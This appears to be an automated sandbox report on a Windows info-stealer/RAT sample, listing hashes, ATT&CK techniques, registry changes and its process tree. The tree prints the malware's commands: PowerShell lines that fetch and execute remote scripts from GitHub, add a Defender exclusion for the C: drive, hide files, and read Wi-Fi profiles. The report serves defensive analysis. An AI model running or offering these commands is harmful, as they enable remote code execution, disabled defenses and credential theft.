42a5e5b6f7d8a8050ee447b10eb4d40f4139384eae540c2478eb5f245b169454

Analysis

max time kernel
139s
max time network
108s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
26/08/2024, 14:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe
Size

14.0MB
MD5

33e42c6132738421fbd8d41e90e9fe65
SHA1

5595d55fd350e9c5b86dab3ad34801e3b6f4ed54
SHA256

42a5e5b6f7d8a8050ee447b10eb4d40f4139384eae540c2478eb5f245b169454
SHA512

0d0959e7509d16a521867448336a5f769697eb8afbd0a7958a82fd1b09035c406739669773dc3b9e82b97e61ca13b9fbf590c17c79ed48539bcb5078d45213fe
SSDEEP

196608:/TcP4exdPjzqkplq6Vk/0zhXYt9zFJ4JeIr9U+:/E4+zqkRVM0zWt95J4eIP

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
16	3004	powershell.exe
17	3584	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3628	PowerShell.exe
3004	powershell.exe
3584	powershell.exe
4636	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4092	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
17	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4768	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
892	netsh.exe
3720	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
2624	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4872	ipconfig.exe
2624	NETSTAT.EXE
1724	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1084	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4636	powershell.exe
3004	powershell.exe
3628	PowerShell.exe
3584	powershell.exe
3584	powershell.exe
3628	PowerShell.exe
3004	powershell.exe
4636	powershell.exe
3584	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeDebugPrivilege	3628	PowerShell.exe
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: 33	4004	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4004	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	3584	powershell.exe
Token: SeSecurityPrivilege	3584	powershell.exe
Token: SeTakeOwnershipPrivilege	3584	powershell.exe
Token: SeLoadDriverPrivilege	3584	powershell.exe
Token: SeSystemProfilePrivilege	3584	powershell.exe
Token: SeSystemtimePrivilege	3584	powershell.exe
Token: SeProfSingleProcessPrivilege	3584	powershell.exe
Token: SeIncBasePriorityPrivilege	3584	powershell.exe
Token: SeCreatePagefilePrivilege	3584	powershell.exe
Token: SeBackupPrivilege	3584	powershell.exe
Token: SeRestorePrivilege	3584	powershell.exe
Token: SeShutdownPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeSystemEnvironmentPrivilege	3584	powershell.exe
Token: SeRemoteShutdownPrivilege	3584	powershell.exe
Token: SeUndockPrivilege	3584	powershell.exe
Token: SeManageVolumePrivilege	3584	powershell.exe
Token: 33	3584	powershell.exe
Token: 34	3584	powershell.exe
Token: 35	3584	powershell.exe
Token: 36	3584	powershell.exe
Token: SeIncreaseQuotaPrivilege	3584	powershell.exe
Token: SeSecurityPrivilege	3584	powershell.exe
Token: SeTakeOwnershipPrivilege	3584	powershell.exe
Token: SeLoadDriverPrivilege	3584	powershell.exe
Token: SeSystemProfilePrivilege	3584	powershell.exe
Token: SeSystemtimePrivilege	3584	powershell.exe
Token: SeProfSingleProcessPrivilege	3584	powershell.exe
Token: SeIncBasePriorityPrivilege	3584	powershell.exe
Token: SeCreatePagefilePrivilege	3584	powershell.exe
Token: SeBackupPrivilege	3584	powershell.exe
Token: SeRestorePrivilege	3584	powershell.exe
Token: SeShutdownPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeSystemEnvironmentPrivilege	3584	powershell.exe
Token: SeRemoteShutdownPrivilege	3584	powershell.exe
Token: SeUndockPrivilege	3584	powershell.exe
Token: SeManageVolumePrivilege	3584	powershell.exe
Token: 33	3584	powershell.exe
Token: 34	3584	powershell.exe
Token: 35	3584	powershell.exe
Token: 36	3584	powershell.exe
Token: SeIncreaseQuotaPrivilege	3584	powershell.exe
Token: SeSecurityPrivilege	3584	powershell.exe
Token: SeTakeOwnershipPrivilege	3584	powershell.exe
Token: SeLoadDriverPrivilege	3584	powershell.exe
Token: SeSystemProfilePrivilege	3584	powershell.exe
Token: SeSystemtimePrivilege	3584	powershell.exe
Token: SeProfSingleProcessPrivilege	3584	powershell.exe
Token: SeIncBasePriorityPrivilege	3584	powershell.exe
Token: SeCreatePagefilePrivilege	3584	powershell.exe
Token: SeBackupPrivilege	3584	powershell.exe
Token: SeRestorePrivilege	3584	powershell.exe
Token: SeShutdownPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeSystemEnvironmentPrivilege	3584	powershell.exe
Token: SeRemoteShutdownPrivilege	3584	powershell.exe
Token: SeUndockPrivilege	3584	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 4904 wrote to memory of 3584	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	84
PID 4904 wrote to memory of 3584	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	84
PID 4904 wrote to memory of 4636	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	85
PID 4904 wrote to memory of 4636	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	85
PID 4904 wrote to memory of 3004	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	87
PID 4904 wrote to memory of 3004	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	87
PID 4904 wrote to memory of 3628	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	88
PID 4904 wrote to memory of 3628	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	88
PID 4904 wrote to memory of 1272	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	89
PID 4904 wrote to memory of 1272	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	89
PID 4904 wrote to memory of 4336	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	90
PID 4904 wrote to memory of 4336	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	90
PID 4336 wrote to memory of 5068	4336	cmd.exe	91
PID 4336 wrote to memory of 5068	4336	cmd.exe	91
PID 4904 wrote to memory of 1136	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	92
PID 4904 wrote to memory of 1136	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	92
PID 3004 wrote to memory of 3080	3004	powershell.exe	93
PID 3004 wrote to memory of 3080	3004	powershell.exe	93
PID 3584 wrote to memory of 2320	3584	powershell.exe	94
PID 3584 wrote to memory of 2320	3584	powershell.exe	94
PID 3080 wrote to memory of 2228	3080	csc.exe	95
PID 3080 wrote to memory of 2228	3080	csc.exe	95
PID 2320 wrote to memory of 2572	2320	csc.exe	96
PID 2320 wrote to memory of 2572	2320	csc.exe	96
PID 3584 wrote to memory of 892	3584	powershell.exe	98
PID 3584 wrote to memory of 892	3584	powershell.exe	98
PID 3584 wrote to memory of 2896	3584	powershell.exe	103
PID 3584 wrote to memory of 2896	3584	powershell.exe	103
PID 2896 wrote to memory of 1380	2896	net.exe	104
PID 2896 wrote to memory of 1380	2896	net.exe	104
PID 3584 wrote to memory of 4092	3584	powershell.exe	105
PID 3584 wrote to memory of 4092	3584	powershell.exe	105
PID 3584 wrote to memory of 2176	3584	powershell.exe	106
PID 3584 wrote to memory of 2176	3584	powershell.exe	106
PID 3584 wrote to memory of 2900	3584	powershell.exe	107
PID 3584 wrote to memory of 2900	3584	powershell.exe	107
PID 2900 wrote to memory of 1988	2900	net.exe	108
PID 2900 wrote to memory of 1988	2900	net.exe	108
PID 3584 wrote to memory of 4872	3584	powershell.exe	109
PID 3584 wrote to memory of 4872	3584	powershell.exe	109
PID 3584 wrote to memory of 5108	3584	powershell.exe	110
PID 3584 wrote to memory of 5108	3584	powershell.exe	110
PID 5108 wrote to memory of 4396	5108	net.exe	111
PID 5108 wrote to memory of 4396	5108	net.exe	111
PID 3584 wrote to memory of 812	3584	powershell.exe	112
PID 3584 wrote to memory of 812	3584	powershell.exe	112
PID 3584 wrote to memory of 2624	3584	powershell.exe	113
PID 3584 wrote to memory of 2624	3584	powershell.exe	113
PID 3584 wrote to memory of 3076	3584	powershell.exe	114
PID 3584 wrote to memory of 3076	3584	powershell.exe	114
PID 3584 wrote to memory of 1724	3584	powershell.exe	115
PID 3584 wrote to memory of 1724	3584	powershell.exe	115
PID 3584 wrote to memory of 3464	3584	powershell.exe	116
PID 3584 wrote to memory of 3464	3584	powershell.exe	116
PID 3584 wrote to memory of 4768	3584	powershell.exe	117
PID 3584 wrote to memory of 4768	3584	powershell.exe	117
PID 3584 wrote to memory of 3720	3584	powershell.exe	118
PID 3584 wrote to memory of 3720	3584	powershell.exe	118
PID 4904 wrote to memory of 1084	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	128
PID 4904 wrote to memory of 1084	4904	2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe	128

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1136	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-26_33e42c6132738421fbd8d41e90e9fe65_poet-rat_snatch.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dxv33ixt\dxv33ixt.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2320
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7BA.tmp" "c:\Users\Admin\AppData\Local\Temp\dxv33ixt\CSC5D75F4BE956D4899BC715D2AA2892DB.TMP"
      4⤵
      PID:2572
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:892
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2896
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:1380
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4092
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:2176
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2900
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:1988
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:4872
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5108
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:4396
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:812
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:2624
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:3076
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:1724
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:3464
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:4768
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3004
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cb4kai0b\cb4kai0b.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3080
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7B9.tmp" "c:\Users\Admin\AppData\Local\Temp\cb4kai0b\CSCB212010135B7428BAC648C3050BDE7FE.TMP"
      4⤵
      PID:2228
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3628
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:1272
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:5068
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:1136
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  PID:1084

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4a0 0x3f8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102
